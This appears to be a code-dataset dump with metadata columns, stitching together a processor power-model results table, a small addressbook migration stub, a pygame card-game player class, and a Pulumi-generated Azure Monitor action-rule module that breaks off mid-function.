'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0397479,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.5283,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100475,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.135002,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.86952,
'Instruction Fetch Unit/Runtime Dynamic': 0.288137,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0229324,
'L2/Runtime Dynamic': 0.00416145,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.5319,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.626983,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0418893,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0418893,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.72971,
'Load Store Unit/Runtime Dynamic': 0.875457,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.103292,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.206584,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0366586,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.037002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.157201,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0164745,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.376283,
'Memory Management Unit/Runtime Dynamic': 0.0534764,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7877,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0269847,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00634203,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0685573,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.101884,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.70743,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.097345545003192,
'Runtime Dynamic': 5.097345545003192,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.261124,
'Runtime Dynamic': 0.0835134,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 75.8456,
'Peak Power': 108.958,
'Runtime Dynamic': 17.0303,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 75.5845,
'Total Cores/Runtime Dynamic': 16.9468,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.261124,
'Total L3s/Runtime Dynamic': 0.0835134,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.075492 | 124 | 0.682129 | 8,082 | 68,619 | 5.785573 | 0.067681 | 0.123527 | 0.112919 | 0.093415 | 0.939113 | 0.931243 | 0.917855 | 0.886097 | 0.862871 | 0.842234 | 0 | 0.132111 | 0.224296 | 68,619 | 914 | 125 | 75.075492 | 0.746355 | 0 | 0 | 0.642232 | 0 | 0 | 0.657316 | 0.048091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3344166e05a79580d3dd00f0ef3a322a014a2ac1 | 210 | py | Python | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | import icemac.addressbook.generations.utils
@icemac.addressbook.generations.utils.evolve_addressbooks
def evolve(address_book):
"""Install the calendar export into each existing address book."""
pass
| 26.25 | 70 | 0.795238 | 25 | 210 | 6.6 | 0.72 | 0.206061 | 0.339394 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 210 | 7 | 71 | 30 | 0.891892 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
6832e7e3c7a2594b78866b01469616cdc7205e8e | 8,048 | py | Python | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | #Copyright (c) 2021 Kason Suchow
import pygame
import ui
import data
import cards
import cardManager
class PlayerOne():
def __init__(self):
self.redMana = 0
self.blueMana = 0
self.greenMana = 0
self.meditationPoints = 3
self.redManaCounter = ui.ManaCounter(903, 508, 'red')
self.blueManaCounter = ui.ManaCounter(948, 508, 'blue')
self.greenManaCounter = ui.ManaCounter(925, 410, 'green')
self.meditationCounter = ui.MeditationCounter(923, 608)
self.deck = [
cards.RedMana(),
cards.BlueMana(),
cards.GreenMana(),
cards.Turtle(),
cards.Souls()
]
self.deckpos = (18, 670)
self.hand = []
self.handpos = (120, 670)
self.defenders = []
self.defenderspos = (18, 535)
self.attackers = []
self.attackerspos = (18, 412)
self.graveyard = []
self.graveyardpos = (801, 670)
cardManager.placeDeck(self)
cardManager.shuffleDeck(self)
def draw(self, surface):
self.drawCounters(surface)
self.drawCards(surface)
def update(self):
self.updateCounters()
self.updateCards()
def drawCounters(self, surface):
self.redManaCounter.draw(surface)
self.blueManaCounter.draw(surface)
self.greenManaCounter.draw(surface)
self.meditationCounter.draw(surface)
def drawCards(self, surface):
for x in range(len(self.deck)):
card = self.deck[x]
card.draw(surface)
for x in range(len(self.hand)):
card = self.hand[x]
card.draw(surface)
for x in range(len(self.defenders)):
card = self.defenders[x]
card.draw(surface)
for x in range(len(self.attackers)):
card = self.attackers[x]
card.draw(surface)
for x in range(len(self.graveyard)):
card = self.graveyard[x]
card.draw(surface)
def updateCounters(self):
self.redManaCounter.update(self.redMana)
self.blueManaCounter.update(self.blueMana)
self.greenManaCounter.update(self.greenMana)
self.meditationCounter.update(self.meditationPoints)
def updateCards(self):
for x in range(len(self.deck)):
try:
card = self.deck[x]
card.update()
except:
pass
for x in range(len(self.hand)):
try:
card = self.hand[x]
card.update()
card.checkClicked(self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.hand, x, self)
if card.move == 'defenders':
cardManager.moveCardToDefenders(x, self)
if card.move == 'attackers':
cardManager.moveCardToAttackers(x, self)
except:
pass
for x in range(len(self.defenders)):
try:
card = self.defenders[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.defenders, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.defenders, x, self)
except:
pass
for x in range(len(self.attackers)):
try:
card = self.attackers[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.attackers, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.attackers, x, self)
except:
pass
for x in range(len(self.graveyard)):
try:
card = self.graveyard[x]
card.update()
except:
pass
class PlayerTwo():
def __init__(self):
self.redMana = 0
self.blueMana = 0
self.greenMana = 0
self.meditationPoints = 3
self.redManaCounter = ui.ManaCounter(13, 248, 'red')
self.blueManaCounter = ui.ManaCounter(58, 248, 'blue')
self.greenManaCounter = ui.ManaCounter(35, 150, 'green')
self.meditationCounter = ui.MeditationCounter(33, 348)
self.deck = [
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana()
]
self.deckpos = (902, 18)
self.hand = []
self.handpos = (220, 18)
self.defenders = []
self.defenderspos = (118, 152)
self.attackers = []
self.attackerspos = (118, 275)
self.graveyard = []
self.graveyardpos = (118, 18)
cardManager.placeDeck(self)
cardManager.shuffleDeck(self)
def draw(self, surface):
self.drawCounters(surface)
self.drawCards(surface)
def update(self):
self.updateCounters()
self.updateCards()
def drawCounters(self, surface):
self.redManaCounter.draw(surface)
self.blueManaCounter.draw(surface)
self.greenManaCounter.draw(surface)
self.meditationCounter.draw(surface)
def drawCards(self, surface):
for x in range(len(self.deck)):
card = self.deck[x]
card.draw(surface)
for x in range(len(self.hand)):
card = self.hand[x]
card.draw(surface)
for x in range(len(self.defenders)):
card = self.defenders[x]
card.draw(surface)
for x in range(len(self.attackers)):
card = self.attackers[x]
card.draw(surface)
for x in range(len(self.graveyard)):
card = self.graveyard[x]
card.draw(surface)
def updateCounters(self):
self.redManaCounter.update(self.redMana)
self.blueManaCounter.update(self.blueMana)
self.greenManaCounter.update(self.greenMana)
self.meditationCounter.update(self.meditationPoints)
def updateCards(self):
for x in range(len(self.deck)):
try:
card = self.deck[x]
card.update()
except:
pass
for x in range(len(self.hand)):
try:
card = self.hand[x]
card.update()
card.checkClicked(self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.hand, x, self)
if card.move == 'defenders':
cardManager.moveCardToDefenders(x, self)
if card.move == 'attackers':
cardManager.moveCardToAttackers(x, self)
except:
pass
for x in range(len(self.defenders)):
try:
card = self.defenders[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.defenders, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.defenders, x, self)
except:
pass
for x in range(len(self.attackers)):
try:
card = self.attackers[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.attackers, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.attackers, x, self)
except:
pass
for x in range(len(self.graveyard)):
try:
card = self.graveyard[x]
card.update()
except:
pass
| 27.281356 | 78 | 0.527336 | 775 | 8,048 | 5.465806 | 0.12129 | 0.018886 | 0.028329 | 0.051936 | 0.877479 | 0.822238 | 0.822238 | 0.822238 | 0.806893 | 0.806893 | 0 | 0.021666 | 0.36916 | 8,048 | 294 | 79 | 27.37415 | 0.812685 | 0.003852 | 0 | 0.855204 | 0 | 0 | 0.016218 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063348 | false | 0.045249 | 0.022624 | 0 | 0.095023 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6848b205ceada98f1e98f9662b57aa7fe6503ea8 | 24,044 | py | Python | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ActionRuleActionGroupArgs', 'ActionRuleActionGroup']
@pulumi.input_type
class ActionRuleActionGroupArgs:
def __init__(__self__, *,
action_group_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
condition: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ActionRuleActionGroup resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "action_group_id", action_group_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> pulumi.Input[str]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@action_group_id.setter
def action_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "action_group_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ActionRuleActionGroupState:
def __init__(__self__, *,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ActionRuleActionGroup resources.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input['ActionRuleActionGroupConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if action_group_id is not None:
pulumi.set(__self__, "action_group_id", action_group_id)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@action_group_id.setter
def action_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_group_id", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ActionRuleActionGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an Monitor Action Rule which type is action group.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_group = azure.monitoring.ActionGroup("exampleActionGroup",
resource_group_name=example_resource_group.name,
short_name="exampleactiongroup")
example_action_rule_action_group = azure.monitoring.ActionRuleActionGroup("exampleActionRuleActionGroup",
resource_group_name=example_resource_group.name,
action_group_id=example_action_group.id,
scope=azure.monitoring.ActionRuleActionGroupScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionRuleActionGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Monitor Action Rule which type is action group.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_group = azure.monitoring.ActionGroup("exampleActionGroup",
resource_group_name=example_resource_group.name,
short_name="exampleactiongroup")
example_action_rule_action_group = azure.monitoring.ActionRuleActionGroup("exampleActionRuleActionGroup",
resource_group_name=example_resource_group.name,
action_group_id=example_action_group.id,
scope=azure.monitoring.ActionRuleActionGroupScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param ActionRuleActionGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionRuleActionGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
